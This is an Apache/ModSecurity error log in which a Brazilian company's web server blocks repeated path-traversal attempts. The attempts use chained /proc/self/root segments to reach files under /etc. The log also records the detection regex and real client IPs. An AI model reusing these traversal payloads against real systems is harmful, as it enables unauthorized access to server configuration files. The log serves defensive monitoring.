[Mon Mar 16 11:01:16.165319 2026] [:error] [pid 21946:tid 140411607643904] [client 74.7.243.203:36876] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNLHbQATo66fKoS7xD2AAAANA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:01:18.657462 2026] [:error] [pid 10651:tid 140411683178240] [client 74.7.243.203:36886] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNLrysWC90G-1nBrA6swAAAYc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:01:19.984027 2026] [:error] [pid 21805:tid 140411691570944] [client 74.7.243.203:36898] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNL7ABkC4fWIHEf8HiEgAAAEY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:01:21.285813 2026] [:error] [pid 21533:tid 140411582465792] [client 74.7.243.203:41836] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNMXjZBu2q05ozVU9LlgAAAVM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:01:24.628762 2026] [:error] [pid 21806:tid 140411641214720] [client 74.7.243.203:41848] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNNNSswJuvopo3lOhWBgAAAIw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:01:27.030916 2026] [:error] [pid 32654:tid 140411741927168] [client 74.7.243.203:41862] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNNwlT9VtDQc7bgUyjXgAAAQA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:01:28.339390 2026] [:error] [pid 21946:tid 140411616036608] [client 74.7.243.203:41874] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNOHbQATo66fKoS7xD2gAAAM8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:01:32.928801 2026] [:error] [pid 10772:tid 140411565680384] [client 74.7.243.203:41888] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNPP9ocpUE4ed4uDzjdAAAAhU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:01:34.216377 2026] [:error] [pid 21533:tid 140411557287680] [client 74.7.243.203:35968] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNPnjZBu2q05ozVU9LmAAAAVY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:01:36.616961 2026] [:error] [pid 10831:tid 140411624429312] [client 74.7.243.203:35978] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNQI6lpbStxTqkSktjhQAAAk4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:01:37.956145 2026] [:error] [pid 21806:tid 140411582465792] [client 74.7.243.203:35992] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNQdSswJuvopo3lOhWCAAAAJM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:01:40.254015 2026] [:error] [pid 32654:tid 140411574073088] [client 74.7.243.203:36006] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNRAlT9VtDQc7bgUyjagAAARQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:01:42.043089 2026] [:error] [pid 10709:tid 140411607643904] [client 74.7.243.203:55058] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNRRXjF1vJNtV6CWruFgAAAdA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:01:43.393948 2026] [:error] [pid 21533:tid 140411658000128] [client 74.7.243.203:55070] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNR3jZBu2q05ozVU9LmgAAAUo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:01:46.762257 2026] [:error] [pid 21533:tid 140411725141760] [client 74.7.243.203:55080] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNSnjZBu2q05ozVU9LnQAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:01:51.474689 2026] [:error] [pid 32654:tid 140411557287680] [client 74.7.243.203:55088] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNTwlT9VtDQc7bgUyjegAAARY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:02:00.952079 2026] [:error] [pid 10709:tid 140411658000128] [client 74.7.243.203:58318] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNVxXjF1vJNtV6CWruHQAAAco"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 11:02:08.918907 2026] [:error] [pid 10651:tid 140411540502272] [client 74.7.243.203:34130] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNYLysWC90G-1nBrA6wwAAAZg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 11:02:14.441134 2026] [:error] [pid 21946:tid 140411683178240] [client 74.7.243.203:40482] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNZnbQATo66fKoS7xEDAAAAMc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:02:22.618518 2026] [access_compat:error] [pid 32654:tid 140411725141760] [client 193.233.126.116:34002] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/xmlrpc.php
[Mon Mar 16 11:02:26.431572 2026] [:error] [pid 10709:tid 140411691570944] [client 74.7.243.203:40488] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNchXjF1vJNtV6CWruLwAAAcY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 11:02:29.876871 2026] [:error] [pid 10709:tid 140411624429312] [client 74.7.243.203:34476] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgNdRXjF1vJNtV6CWruNQAAAc4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
